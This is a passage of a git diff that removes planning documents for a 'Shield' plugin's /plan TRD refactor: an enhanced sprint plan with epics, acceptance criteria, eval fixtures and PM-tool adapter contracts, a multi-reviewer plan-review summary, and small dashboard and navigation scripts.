  • Mixed-domain handling (P0-6): when both infra and backend markers are detected (or plan.template_override == "mixed"), the generator prepends [backend] and [infra] labels to subsection bullets within each section that has divergent interpretations. Worked example: §11 APIs Involved emits a ### [backend] HTTP API contracts subsection AND a ### [infra] Module interfaces & cloud-API surface subsection. A positive-mixed/ eval fixture in EPIC-3-S1 demonstrates the shape.
  • -
  • Output-paths deprecation overlap (P1-9): add plan_trd_md ({output_dir}/{feature}/trd.md) and plan_trd_html ({output_dir}/{feature}/outputs/trd.html) to shield/schema/output-paths.yaml. Keep plan_arch_md and plan_arch_html with deprecated: true in the entry; remove in M3 or a follow-up PR. Mirror in shield/commands/plan.md outputs: frontmatter.
  • -
  • Update render-markdown helper invocation to render trd.md to outputs/trd.html.
  • -
  • Provenance stamp (P1-10): the generator emits a top-of-file HTML comment in trd.md: <!-- generated by /plan v{plugin-version} on {YYYY-MM-DD} --> where {plugin-version} is read from .claude-plugin/marketplace.json.
  • -
  • Atomic write (P1-14): the generator writes trd.md.tmp first, then renames to trd.md. If any step fails (template-load error, prompt error, write error), it removes trd.md.tmp and surfaces the error message — never leaves a partial trd.md behind.
  • -
-

Acceptance criteria

-
    -
  • Running /plan in a fresh feature folder writes trd.md and outputs/trd.html.
  • -
  • /plan no longer writes plan-architecture.md anywhere.
  • -
  • output-paths.yaml lists plan_trd_md and plan_trd_html; plan_arch_md and plan_arch_html are marked deprecated: true.
  • -
  • Running /plan on a folder with only infra markers produces a TRD where infra interpretation dominates §4–7, §11, §14.
  • -
  • Running /plan on a folder with only backend markers produces a TRD where backend interpretation dominates the same sections.
  • -
  • (P0-6) Running /plan on a folder with both infra and backend markers produces a TRD where divergent sections carry [backend] and [infra] labeled subsections.
  • -
  • (P1-5) Setting .shield.json plan.template_override to one of {infra, backend, mixed} overrides repo-marker detection.
  • -
  • (P1-10) Emitted trd.md carries a <!-- generated by /plan vX.Y.Z on YYYY-MM-DD --> comment as the first line after frontmatter.
  • -
  • (P1-14) Killing /plan mid-write (e.g., SIGTERM during generation) does not leave a corrupted trd.md; only trd.md.tmp may remain and is removed on next invocation.
  • -
-

EPIC-1-S3 · Update existing-feature behavior on re-run · priority: medium

-

(unchanged from plan.md)

-

EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate · priority: high (new — P1-12)

-

CLAUDE.md "Plugin isolation / Versioning" requires bumping .claude-plugin/marketplace.json and pyproject.toml in the same commit as any plugin update. The TRD refactor is silent on this; add the bump here.

-

Tasks

-
    -
  • Bump .claude-plugin/marketplace.json version field for the Shield plugin entry.
  • -
  • Bump pyproject.toml version in any package modified (shield/adapters/clickup/pyproject.toml, plus new adapter packages from EPIC-4-S0).
  • -
  • Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from plan-architecture.md to trd.md.
  • -
-

Acceptance criteria

-
    -
  • The M1 PR includes both version bumps in the same commit as the SKILL.md changes.
  • -
  • CHANGELOG mentions the cutover and the schema 1.1 → 1.2 bump.
  • -
-
-

EPIC-2 · Story schema and design traceability · M1

-

EPIC-2-S1 · Extend plan.json schema with optional design_refs[] · priority: high

-

Add an optional design_refs[] array to each story in the plan.json sidecar. Shape: {doc, component?, section_id, anchor_url, label}. Bump sidecar schema to 1.2; preserve back-compat.

-

Tasks

-
    -
  • Edit sidecar-schema.md to add design_refs[] field on the story record.
  • -
  • Bump version key in schema example from '1.1' to '1.2'.
  • -
  • Document back-compat: 1.1/1.0 sidecars without design_refs[] remain valid.
  • -
  • (P1-15) Add a forward-compat policy subsection to sidecar-schema.md: when /plan-review encounters version > current, it warns but does not reject; unknown top-level keys are preserved on round-trip; unknown doc enum values fail validation.
  • -
  • Add a 'design_refs[] field' subsection with per-field semantics (doc ∈ {trd, lld, prd}; component for LLD scoping; anchor_url stable across heading renames).
  • -
  • (P2-6) Add an inline example design_refs[] JSON instance (one TRD ref + one LLD placeholder).
  • -
-

Acceptance criteria

-
    -
  • sidecar-schema.md documents design_refs[] with version 1.2 and a forward-compat policy.
  • -
  • A plan.json with no design_refs[] still validates as 1.2.
  • -
  • A plan.json with design_refs[] populated validates as 1.2.
  • -
  • An inline example is present in the schema doc.
  • -
-

EPIC-2-S2 · Populate design_refs[] when /plan has TRD context · priority: high

-

When /plan generates stories, populate each story's design_refs[] with a forward link to the TRD section it implements.

-

Tasks

-
    -
  • Update generation prompt: for each story, emit at least one design_refs entry pointing at a real trd.md#{section-id} anchor.
  • -
  • (P1-1) Section-ID selection heuristic: lowercase the story's name, tokenize on whitespace and punctuation, score each TRD section anchor slug by token-overlap count (Jaccard similarity), pick the highest-scoring slug. Tie-break by section order (lower § number wins). If no token overlaps with any slug, fall back to §7 high-level-design.
  • -
  • For LLD references, emit placeholders with doc='lld', component=null, anchor_url=null, label='TODO: link when /lld <component> lands'.
  • -
  • (P1-2) Re-run merge semantics: on /plan re-run, match existing design_refs[] entries by (doc, section_id, component) tuple. If found: replace label and anchor_url if changed, never duplicate. If a stored entry no longer has a matching TRD section (anchor deleted), preserve it but mark stale: true. New refs append.
  • -
-

Acceptance criteria

-
    -
  • A /plan run on a feature with trd.md emits at least one design_refs entry per story.
  • -
  • Each story has at least one TRD design_ref; LLD refs are TODO placeholders.
  • -
  • (P1-1) Story name "Implement POST /users endpoint" resolves to section_id: "api-create-user" if that anchor exists, else high-level-design.
  • -
  • (P1-2) Running /plan twice on the same plan does not duplicate design_refs[] entries — verified by an eval fixture.
  • -
  • (P1-2) Deleting a TRD section between /plan runs results in the matching design_refs[] entry being marked stale: true (rather than removed).
  • -
-

EPIC-2-S3 · Add JSON Schema validator for plan.json · priority: high (new — P1-7)

-

Two version bumps (1.1 → 1.2 → 1.3) without a machine-readable validator is the drift inflection. Add it now.

-

Tasks

-
    -
  • Create shield/scripts/validate_plan.py using pydantic (preferred — already in the deps tree via clickup adapter) or jsonschema.
  • -
  • Schema definition lives at shield/schema/plan-sidecar.schema.json (machine-readable counterpart to sidecar-schema.md).
  • -
  • Validator is invoked by /plan-review (first check) and the eval runner (in EPIC-3).
  • -
  • Reject unknown doc enum values, enforce design_refs[] cardinality (min 1 per story when populated), reject unknown sidecar versions newer than current.
  • -
-

Acceptance criteria

-
    -
  • uv run shield/scripts/validate_plan.py <path> exits 0 on valid sidecars and non-zero with a named error on invalid ones.
  • -
  • /plan-review invokes the validator before applying rubric checks and aborts on schema failure.
  • -
  • Sidecar version forward-compat behavior matches the policy in sidecar-schema.md (warn on > current, accept-with-ignored-unknown-keys).
  • -
-
-

EPIC-3 · Eval coverage for TRD format · M1

-

EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra + mixed) · priority: high

-

Create three positive fixture trd.md files: backend, infra, and mixed (P0-6). The infra fixture uses n/a — <reason> on at least one section; the mixed fixture uses [backend]/[infra] labeled subsections on at least §11 APIs Involved.

-

Tasks

-
    -
  • Author shield/evals/plan-trd/fixtures/positive-backend/trd.md with all 14 sections (Bytebite-style fictional feature).
  • -
  • Author shield/evals/plan-trd/fixtures/positive-infra/trd.md with all 14 sections (fictional terraform/atmos change). At least one section uses n/a — <reason>.
  • -
  • (P0-6) Author shield/evals/plan-trd/fixtures/positive-mixed/trd.md with all 14 sections for a fictional feature that has both backend code and an infra component (e.g., a new internal microservice with its own RDS instance). §11 APIs Involved demonstrates the [backend] / [infra] labeled-subsection shape.
  • -
  • Author corresponding plan.json sidecars with design_refs[] entries pointing at fixture trd.md anchors.
  • -
  • Write shield/evals/plan-trd.yaml with all three positive cases wired.
  • -
-

Acceptance criteria

-
    -
  • All three positive fixtures pass the eval.
  • -
  • The infra fixture uses n/a — <reason> on at least one section.
  • -
  • The mixed fixture uses labeled subsections on at least §11.
  • -
  • Fixtures are self-contained (no external API calls, no LLM dispatches).
  • -
-

EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures · priority: high

-

(P0-1, P0-4) For each of the 14 required sections, author a fixture that omits it. Add one drift-by-addition fixture (15th section). Add one vague-TBD fixture. Total: 16 negative fixtures.

-

Tasks

-
    -
  • 14 missing-section fixtures under shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md.
  • -
  • 1 drift-by-addition fixture under shield/evals/plan-trd/fixtures/extra-section/trd.md.
  • -
  • 1 vague-TBD fixture under shield/evals/plan-trd/fixtures/vague-tbd/trd.md (§6 NFRs contains only 'TBD').
  • -
  • Wire each into shield/evals/plan-trd.yaml with named expected_error.
  • -
-

Acceptance criteria

-
    -
  • 16 negative fixtures total exist and fail with the expected named errors.
  • -
  • Drift fixture fails with 'unexpected section'; vague-TBD fails with 'vague section content'; missing-section fixtures fail with their section's slug in the error message.
  • -
-

EPIC-3-S3 · Wire eval into recurring CI + RED-GREEN paper trail · priority: high (P0-5, P1-4 — renamed)

-

Wire shield/evals/plan-trd.yaml into a recurring CI job, not just one-shot PR-body capture. Capture RED→GREEN trail in the implementation PR.

-

Tasks

-
    -
  • (P0-5) Create or extend .github/workflows/eval-plan-trd.yml (or wire into the existing eval workflow if one exists) that runs uv run shield/evals/run.py plan-trd on every PR touching shield/skills/general/plan-docs/**, shield/schema/**, or shield/evals/plan-trd/**.
  • -
  • Before any /plan command changes: run the eval and confirm RED.
  • -
  • After /plan changes land: run the eval and confirm GREEN (3 positives pass; 16 negatives fail with the right named errors).
  • -
  • Capture both runs in the implementation PR description.
  • -
-

Acceptance criteria

-
    -
  • A GitHub Actions workflow exists that runs the eval on PRs touching the relevant paths.
  • -
  • The workflow fails the build if the eval reports any fixture mismatch.
  • -
  • PR body for the M1 cutover contains both RED and GREEN sections, showing 3 positives + 16 negatives behaving as expected before and after.
  • -
  • The eval invocation is consistently uv run shield/evals/run.py plan-trd (no "or equivalent" hedge).
  • -
-
-

EPIC-4 · /plan-review and /pm-sync wiring · M2

-

EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages · priority: high (new — P0-2)

-

Only shield/adapters/clickup/ exists today as a uv package. EPIC-4-S3 implies four adapters land in one story but three of them have no pyproject.toml, no tests/, no MCP server skeleton. Scaffold them first.

-

Tasks

-
    -
  • Create shield/adapters/jira/ with pyproject.toml declaring requests (or atlassian-python-api) as a dep, server/ skeleton mirroring clickup's layout, tests/ directory with a placeholder contract test, and .mcp.json entry.
  • -
  • Same for shield/adapters/confluence/.
  • -
  • Same for shield/adapters/notion/.
  • -
  • Create shield/adapters/_common/design_refs.py exposing the DesignRef dataclass and the forward_design_refs protocol interface (see EPIC-4-S3 for shape).
  • -
  • Update top-level pyproject if needed to add the new packages to the workspace.
  • -
-

Acceptance criteria

-
    -
  • Each new adapter directory has a working pyproject.toml resolvable by uv sync.
  • -
  • Each new adapter has a placeholder contract test that runs (and may be skipped) under uv run pytest shield/adapters/<tool>/tests/.
  • -
  • shield/adapters/_common/design_refs.py exports DesignRef, ForwardResult, ForwardError, and a protocol/abstract class for forward_design_refs.
  • -
  • .mcp.json entries for the new adapters are present (even if disabled until EPIC-4-S3 lands the real logic).
  • -
-

EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review · priority: high (P1-6 added)

-

Extend /plan-review rubric to check 14 required sections, the n/a — <reason> escape, and stale design_refs[] anchors.

-

Tasks

-
    -
  • TRD section presence rule (imports 14-entry slug allow-list; checks each anchor exists).
  • -
  • TRD section content rule (accepts real content or n/a — <reason>; flags 'TBD'/empty).
  • -
  • (P1-6) Stale-anchor rule: for each story's design_refs[].anchor_url, parse the #section-id and assert it exists in the linked trd.md. Report mismatches as Critical findings.
  • -
  • Eval fixtures under shield/evals/plan-review-trd/ exercising all three rules.
  • -
-

Acceptance criteria

-
    -
  • /plan-review flags missing sections by slug as Critical.
  • -
  • /plan-review does not flag presence/content for valid TRDs (including n/a — <reason>).
  • -
  • TBD-only sections flag as vague-content Critical.
  • -
  • n/a without reason flags as missing-reason.
  • -
  • (P1-6) A plan.json whose story design_refs[].anchor_url points at a non-existent anchor in trd.md flags as Critical with the offending anchor in the message.
  • -
-

EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review · priority: medium

-

(unchanged from plan.md)

- -

Update /pm-sync adapters to forward each story's design_refs[] entries as web links on the synced task. Use a deterministic idempotency key to prevent duplicates on re-run.

-

Adapter file paths (P1-3):

-
    -
  • shield/adapters/clickup/server/tools/sync.py — extend existing
  • -
  • shield/adapters/jira/server/tools/sync.py — new (per EPIC-4-S0)
  • -
  • shield/adapters/confluence/server/tools/sync.py — new
  • -
  • shield/adapters/notion/server/tools/sync.py — new
  • -
-

Adapter interface contract (P0-3): -Each adapter exposes:

-
def forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult: ...
-
-

where ForwardResult is {created: int, skipped: int, errors: list[ForwardError]}. DesignRef and ForwardResult are defined in shield/adapters/_common/design_refs.py (from EPIC-4-S0).

-

Idempotency key: each DesignRef produces idempotency_key = sha256(story_id + anchor_url)[:32]. Adapters use this as:

-
    -
  • Jira: the globalId field on remote_issue_link
  • -
  • Confluence: the name field on remote_link
  • -
  • ClickUp: the comparison key for URL custom field deduplication before write
  • -
  • Notion: the comparison key for URL property deduplication before write
  • -
-

Observability (P1-8): each forwarded ref emits one action_log entry with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit action='forward_design_ref_failed' with {error_class, http_status, idempotency_key}.

-

Tool & access requirements (P1-13):

-
    -
  • Test tenants: each adapter integration test uses a free-tier sandbox tenant (Confluence Cloud free tier, Jira Cloud free tier, ClickUp free workspace, Notion free workspace) OR uses HTTP mocking via responses library (preferred — credential-free CI).
  • -
  • Credentials in tests: when integration tests run live, credentials come from SHIELD_<ADAPTER>_TOKEN env vars; CI defaults to mocked mode.
  • -
  • Python deps: Jira → requests; Confluence → requests; ClickUp → existing httpx; Notion → requests. All declared in each adapter's pyproject.toml.
  • -
-

Idempotency test (P0-4):

-
    -
  • Eval fixture under shield/adapters/<tool>/tests/test_idempotency.py that runs forward_design_refs twice with the same input against a mocked remote and asserts the second call produces 0 created and N skipped.
  • -
-

Tasks

-
    -
  • Edit shield/commands/pm-sync.md to describe design_refs[] forwarding contract and idempotency key.
  • -
  • Implement forward_design_refs in each of the four adapter files above.
  • -
  • Adapters that have no link affordance log 'design_refs forwarding skipped — adapter does not support web links' instead of failing.
  • -
  • Adapter eval fixtures using responses / respx HTTP mocking; plus the idempotency test from P0-4.
  • -
-

Acceptance criteria

-
    -
  • Running /pm-sync against each of {Confluence, Jira, ClickUp, Notion} forwards design_refs[] URLs on the synced task.
  • -
  • Running /pm-sync with empty design_refs[] succeeds with no side effect.
  • -
  • Adapter fixtures pass in shield/evals/.
  • -
  • (P0-4) Running /pm-sync twice on the same plan produces no duplicates — verified by per-adapter idempotency test.
  • -
  • (P0-3) All four adapters implement the same forward_design_refs(task_id, refs) → ForwardResult signature from shield/adapters/_common/design_refs.py.
  • -
  • (P1-8) action_log entries are emitted per ref with the documented fields.
  • -
-
-

EPIC-5 · Drift + duplication hardening · M3

-

(unchanged from plan.md — EPIC-5-S1 and EPIC-5-S2 stay as drafted)

-
-

Out of scope (locked)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ItemStatus
/lld <component> commandTemplate locked at 14 sections per PR #43 sample; authoring command is a separate epic. Typically backend-only.
Adapter auto-creation of design-doc pages in Confluence/Notionv2 enhancement.
Structured ClickUp/Notion relationships beyond URL fieldsv2 enhancement.
Migration tool for existing plan-architecture.mdDirect cutover; files stay readable.
trd_sha content hash (vs commit SHA)Deferred (Architect P2). Worth revisiting after M3 ships if last_aligned_with proves insufficient.
template_version field on TRD frontmatterDeferred (Architect P2).
Round-trip integration eval (/plan/plan-review no Criticals)Deferred (Architect P2).
--dry-run mode for /planDeferred (SRE P2).
plan-troubleshooting.mdDeferred (SRE P2).
Concurrent /pm-sync safety (single-writer note)Deferred (Backend P2).
Magic-number defenses for §8 duplication threshold + §7 implementation-manual thresholdDeferred (Architect P2) — keep as documented constants in EPIC-4-S2 / EPIC-5-S2 tasks.
Explicit rollback-trigger statement in plan-architecture.mdDeferred (SRE P1-11) — add to plan-architecture.md in a follow-up commit, not a new story.
-
-

Next steps

-

After applying this enhanced plan (replacing plan.md and updating plan.json):

-
    -
  1. Update plan.json to reflect the structural changes (new stories EPIC-1-S4, EPIC-2-S3, EPIC-4-S0; modified ACs/tasks on EPIC-1-S2, EPIC-2-S2, EPIC-3-S1, EPIC-3-S2, EPIC-3-S3, EPIC-4-S1, EPIC-4-S3). Bump M1 milestone exit criteria.
  2. -
  3. Re-run /plan-review and confirm composite ≥ B+ (target: 3.0+).
  4. -
  5. /pm-sync to push updated stories.
  6. -
  7. /implement starting with EPIC-4-S0 (adapter scaffolding) or EPIC-3-S1 (positive eval fixtures) per the RED → GREEN trail.
  8. -
- - - diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html deleted file mode 100644 index 9a372339..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html +++ /dev/null @@ -1,411 +0,0 @@ - - - - - -Review — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan Review: /plan TRD refactor

-

Date: 2026-05-25 -Plan: docs/shield/plan-trd-refactor-20260524/plan.json (+ plan.md, plan-architecture.md) -Reviewers: DX Engineer, Agile Coach, Architect, Backend Engineer, SRE -Composite Score: B / Ready (with P0 fixes recommended before implementation) -Composite numeric: 2.77 (weighted: Architect+DX+Backend = 1.0; Agile+SRE = 0.7)

-

Verdict

-

The plan is structurally ready — sprint-ready stories, testable ACs, milestone DAG is clean, schema design is well-reasoned, reversibility is documented. But three reviewers (SRE, Backend Engineer, Architect) surfaced 6 P0 recommendations that should be addressed before implementation starts. The most consequential: the adapter work in EPIC-4-S3 is materially larger than the plan implies (only 1 of 4 PM-tool adapters exists today as a uv package), and the eval is wired for one-shot PR-body capture rather than recurring CI gating.

-

Score Summary

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
PersonaGradeWeightNumericKey Finding
Agile CoachA-0.74Sprint-ready: 12/13 points A/A-, milestone DAG clean, all ACs testable
DX EngineerB+1.03Handoff/specification gaps: section_id heuristic, adapter paths, CI vs PR-body
ArchitectB1.03Edge-case completeness: stale "13-section" refs, off-by-N negatives, no stale-anchor detection
SREC0.72Runtime safety net missing: no recurring CI gate, no rollback trigger, no provenance stamp
Backend EngineerC+1.02Adapter contract missing, idempotency undefined, 3 of 4 adapters don't exist as packages
-

P0 Recommendations (block implementation start)

-

These appear with convergent support across multiple reviewers — addressing them is the highest-leverage pre-implementation work.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#RecommendationOriginAffected story
P0-1Fix 14 vs 13 inconsistency across all artifacts. plan-architecture.md lines 25, 37, 75 still say "13-section". EPIC-3-S3 AC says "all 13 negatives" but EPIC-3-S2 enumerates 16 negatives (14 missing-section + 1 drift + 1 vague-TBD). Pick a number and propagate everywhere.Architect P1 + Backend P0EPIC-3-S2, EPIC-3-S3; plan-architecture.md prose
P0-2Split EPIC-4-S3 or add adapter-scaffolding story. Only shield/adapters/clickup/ exists as a uv package today; Jira/Confluence/Notion don't exist. Either split EPIC-4-S3 by adapter (S3a/b/c/d) or add an EPIC-4-S0 that scaffolds pyproject.toml, MCP-server skeleton, tests/, and a shared shield/adapters/_common/design_refs.py for the DesignRef dataclass and forward_design_refs protocol.Backend P0 (verified by repo inspection)EPIC-4-S3
P0-3Specify the adapter interface contract. Lock the function signature across all four adapters before implementation: forward_design_refs(task_id: str, refs: list[DesignRef]) -> ForwardResult with ForwardResult{created, skipped, errors}. Each DesignRef produces a deterministic idempotency key (sha256(story_id + anchor_url)[:32]) used as globalId for Jira/Confluence remote-links.Backend P0EPIC-4-S3; new schema doc in sidecar-schema.md
P0-4Add idempotency test fixture to EPIC-4-S3. Add an AC: "Running /pm-sync twice in succession on the same plan produces the same remote state — no duplicate remote-links, no duplicate ClickUp custom-field writes, no duplicate Notion property writes." Primary regression guard for the most likely incident shape.Backend P0 + Architect P2 (trd_sha)EPIC-4-S3, EPIC-2-S2
P0-5Wire eval into recurring CI, not just one-shot PR body. EPIC-3-S3 says "Wire eval into CI" but the tasks only describe manual PR-body capture. Add a .github/workflows/ step that runs uv run shield/evals/run.py plan-trd on every PR touching shield/skills/general/plan-docs/** or shield/schema/**. Without this, the next plan-docs/SKILL.md edit silently breaks the 14-section contract.SRE P0 + DX P1EPIC-3-S3
P0-6Define mixed-domain failure mode in EPIC-1-S2. "Mixed → annotate per section" is a single line with no worked example, no eval fixture, no AC. Realistic monorepos (Tesseract itself: pyproject.toml + *.tf) will hit this on day 1. Add: (a) a positive-mixed/ fixture under shield/evals/plan-trd/fixtures/, (b) explicit guidance for what "annotate per section" emits, (c) a detection rule (presence of both infra and backend markers).SRE P0 + DX P1 + Architect P1 (3 reviewers)EPIC-1-S2, EPIC-3-S1
-

P1 Recommendations (should land in implementation milestone)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#RecommendationOrigin
P1-1Define section_id heuristic in EPIC-2-S2. The phrase "story title keyword → TRD section anchor" is a hint, not an algorithm. Specify: "lowercase fuzzy match story.name tokens against TRD section anchor slugs; fall back to §7 high-level-design if no token overlaps."DX P1
P1-2Define design_refs[] merge semantics in EPIC-2-S2. "Preserved or updated in place" is ambiguous. Specify: "match by (doc, section_id, component) tuple; replace label if changed, never duplicate keys."DX P1
P1-3Name adapter file paths in EPIC-4-S3. Replace "the relevant adapter logic (Python under shield/adapters/)" with explicit per-tool file paths and the function/class to extend in each.DX P1 + Agile P2
P1-4Rename or rescope EPIC-3-S3. Story title says "CI" but tasks describe manual PR-body capture. Either add a workflow YAML task (with file path) or retitle to "Eval execution + RED-GREEN paper trail".DX P1
P1-5Reconcile domain-detection source. plan.json EPIC-1-S2 description says "detects the dominant domain from .shield.json + repo markers"; plan.md says only "repo markers". Pick one and document the config key if .shield.json is in.DX P1
P1-6Add stale-anchor detection to /plan-review. When a story's design_refs[].anchor_url points at a #section-id no longer present in the live trd.md, /plan-review should report it as a Critical finding. Otherwise sidecar→doc drift goes undetected.Architect P1
P1-7Add JSON Schema validator story. Two version bumps (1.1→1.2→1.3) in one PR series without a machine-readable validator is the drift inflection. Add shield/scripts/validate_plan.py using pydantic or jsonschema. Invoked by /plan-review and the eval runner.Backend P1
P1-8Specify observability shape for adapter forwarding. Each design_refs[] forward emits one action_log entry with action='forward_design_ref', fields {story_id, adapter, anchor_url, outcome, idempotency_key}. Failures emit forward_design_ref_failed with {error_class, http_status}.Backend P1
P1-9Add deprecation overlap for output-paths.yaml. Keep plan_arch_md / plan_arch_html keys with deprecated: true rather than removing in M1. Remove in M3 or follow-up PR to protect external consumers of the contract.Backend P1
P1-10Add provenance stamp on emitted TRDs. Top-of-file comment: <!-- generated by /plan vX.Y.Z on YYYY-MM-DD -->. Pairs with last_aligned_with for full drift accountability.SRE P1
P1-11Add rollback-trigger statement. Plan-architecture.md §Rollback should name observable signals that trigger a revert: e.g., (a) eval fails on positive fixtures after merge, (b) >N user-reported broken /plan runs within 48h, (c) downstream /pm-sync adapter errors trace back to schema 1.2.SRE P1
P1-12Add version-bump task per CLAUDE.md mandate. Bump .claude-plugin/marketplace.json and pyproject.toml per the "When updating any plugin, bump its version in both...in the same commit" rule. Currently absent from every story.SRE P1 + DX P2
P1-13Add tool-and-access requirements subsection. Which Confluence/Jira/ClickUp/Notion test tenants (or mock client expectations), where credentials live (.shield.json? env vars?), which Python deps the eval pulls.DX P1
P1-14Specify atomic write for /plan output. If /plan cannot write trd.md (disk error, partial write, missing template), it must not leave a corrupted file behind — write atomically (temp file + rename) or fail loudly with the partial file removed.SRE P1
P1-15Specify forward-compat policy in sidecar-schema.md. How does /plan-review handle version: "1.4" from a future Shield? Reject, warn, or accept-with-ignored-fields?Backend P1
-

P2 Recommendations (nice to have)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#RecommendationOrigin
P2-1Split EPIC-3-S2 into "negative-fixture generator + 14 missing-section fixtures" and "drift + vague-TBD fixtures" for tighter sizingAgile P2
P2-2Add CHANGELOG entry / migration-note AC for the cutoverAgile P2
P2-3Make intra-milestone story depends_on explicit in plan.jsonAgile P2
P2-4Lock the eval runner invocation (drop "or equivalent existing eval runner")DX P2
P2-5Pick YAML or JSON for the slug allow-list sidecarDX P2
P2-6Add inline design_refs[] JSON example in EPIC-2-S1DX P2
P2-7Add AC for /pm-sync partial-failure behavior (1 of 4 adapters errors)DX P2
P2-8Add "local development" how-to-run note in plan-architecture.mdDX P2
P2-9Defend or parameterize magic numbers (>80 char overlap, >20 line code block)Architect P2
P2-10Add trd_sha content hash alongside last_aligned_with for true undead-doc detectionArchitect P2
P2-11Add TRD template_version field for legitimate template evolutionArchitect P2
P2-12Add round-trip integration eval (/plan output → /plan-review says no Criticals)Architect P2
P2-13Add --dry-run mode for /plan so users validate locally before committingSRE P2
P2-14Add a one-page troubleshooting block (plan-troubleshooting.md)SRE P2
P2-15Add eval fixture for M2 running on pre-M1 plan-architecture.md-only foldersSRE P2
P2-16Concurrent /pm-sync note (single-writer until idempotency-key lands)Backend P2
P2-17Rate-limit handling note per existing adapter postureBackend P2
P2-18Decide fate of this plan's own plan-architecture.md post-M1 (rename or freeze)Backend P2
-

Cross-reviewer convergence

-

The strongest signal is convergent flagging — recommendations cited by 2+ reviewers:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ThemeReviewersSeverity
Mixed-domain handling (EPIC-1-S2)DX, SRE, Architect (3)P0
14 vs 13 inconsistencyArchitect, Backend (2)P0
EPIC-4-S3 adapter file pathsDX, Agile, Backend (3)P0 (escalated)
CI wiring vs PR-body captureDX, SRE (2)P0
Version-bump disciplineDX, SRE (2)P1
Idempotency / re-run safetyArchitect, Backend (2)P0
-

Detailed Agent Findings

- -

Next steps

-
    -
  1. Apply the enhanced plan (enhanced-plan.md) which carries the P0 fixes and most P1 recommendations
  2. -
  3. After applying, re-run /plan-review to confirm composite moves above 3.0 (target: B+/Ready-clean)
  4. -
  5. Then /pm-sync to push the updated stories
  6. -
  7. Then /implement starting with EPIC-3-S1 (positive eval fixtures) per the RED → GREEN trail
  8. -
- -
-
Generated by Shield
- - diff --git a/docs/shield/shield-dashboard.js b/docs/shield/shield-dashboard.js deleted file mode 100644 index 727f693b..00000000 --- a/docs/shield/shield-dashboard.js +++ /dev/null @@ -1,62 +0,0 @@ -// Builds the dashboard card grid + pipeline strip from window.SHIELD_MANIFEST. -// index.html sits at docs/shield root, so root prefix is "". -(function () { - function el(tag, cls, html) { - var e = document.createElement(tag); - if (cls) e.className = cls; - if (html != null) e.innerHTML = html; - return e; - } - var LINKS = [ - ["research", "Research", "research.html"], - ["prd", "PRD", "prd.html"], - ["trd", "TRD", "trd.html"], - ["plan_md", "Plan", "plan.html"], - ]; - var PIPELINE = [ - ["Research", function (a) { return a.research; }], - ["PRD", function (a) { return a.prd; }], - ["Plan", function (a) { return a.plan_md || a.plan_json; }], - ["Implement", function (a, f) { return (f.reviews && f.reviews.code && f.reviews.code.count) > 0; }], - ]; - function card(f) { - var c = el("div", "dash-card"); - var head = el("div"); - head.appendChild(el("h3", null, f.name)); - head.appendChild(el("span", "date", f.updated ? f.updated.slice(0, 10) : "")); - c.appendChild(head); - var pipe = el("div", "pipeline"); - PIPELINE.forEach(function (p) { - var done = !!p[1](f.artifacts || {}, f); - pipe.appendChild(el("span", "pipe-step" + (done ? " done" : ""), p[0])); - }); - c.appendChild(pipe); - var links = el("div", "dash-links"); - LINKS.forEach(function (l) { - if (f.artifacts && f.artifacts[l[0]]) { - var a = el("a", null, l[1]); - a.setAttribute("href", f.name + "/outputs/" + l[2]); - links.appendChild(a); - } - }); - if (f.artifacts && f.artifacts.plan_json) { - var aj = el("a", null, "Sidecar JSON"); - aj.setAttribute("href", f.name + "/plan.json"); - links.appendChild(aj); - } - c.appendChild(links); - return c; - } - document.addEventListener("DOMContentLoaded", function () { - var mount = document.getElementById("shield-dashboard"); - if (!mount) return; - var features = (window.SHIELD_MANIFEST && window.SHIELD_MANIFEST.features) || []; - if (!features.length) { - mount.appendChild(el("div", "dash-empty", "No features yet — run /research or /plan to get started.")); - return; - } - var grid = el("div", "dash-grid"); - features.forEach(function (f) { grid.appendChild(card(f)); }); - mount.appendChild(grid); - }); -})(); diff --git a/docs/shield/shield-nav.js b/docs/shield/shield-nav.js deleted file mode 100644 index 78095491..00000000 --- a/docs/shield/shield-nav.js +++ /dev/null @@ -1,160 +0,0 @@ -// Header breadcrumb + filterable Features panel, built from window.SHIELD_MANIFEST. -// Pure logic (crumbModel, filterFeatures, titleize) is separated from DOM -// rendering and exported for unit tests (node:test). The DOM bootstrap is -// guarded by `typeof document`, so requiring this file in Node is safe. -// No fetch — data comes from manifest.js. file:// safe. -(function () { - var FILE_LABELS = { - "prd.html": "PRD", "trd.html": "TRD", "plan.html": "Plan", - "research.html": "Research", "plan-architecture.html": "Architecture", - "summary.html": "Review", "enhanced-prd.html": "Enhanced PRD", - "enhanced-plan.html": "Enhanced Plan", "index.html": "Dashboard", - }; - // artifact key -> [label, path-within-feature, tag] - var ARTIFACTS = [ - ["research", "Research", "outputs/research.html", "research"], - ["prd", "PRD", "outputs/prd.html", "prd"], - ["trd", "TRD", "outputs/trd.html", 